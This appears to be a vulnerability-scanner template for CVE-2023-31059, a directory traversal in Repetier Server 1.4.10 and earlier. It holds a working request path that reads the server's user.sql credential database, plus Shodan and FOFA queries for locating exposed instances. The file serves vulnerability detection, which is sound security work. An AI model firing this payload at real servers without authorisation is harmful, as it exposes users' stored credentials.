id: CVE-2023-31059

info:
  name: Repetier Server - Directory Traversal
  author: parthmalhotra,pdresearch
  severity: high
  description: |
    Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
    SHODAN: title:"Repetier-Server"
    FOFA: title="Repetier-Server"
  reference:
    - https://cybir.com/2023/cve/poc-repetier-server-140/
    - https://www.repetier-server.com/download-repetier-server/
  tags: cve,cve2023,repetier,lfi
  created: 2023/06/17

rules:
  r0:
    request:
      method: GET
      path: /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php
    expression: |
      response.status == 200 &&
      response.headers['content-type'].contains('text/plain') &&
      response.body.bcontains(b'SQLite format 3')
expression: r0()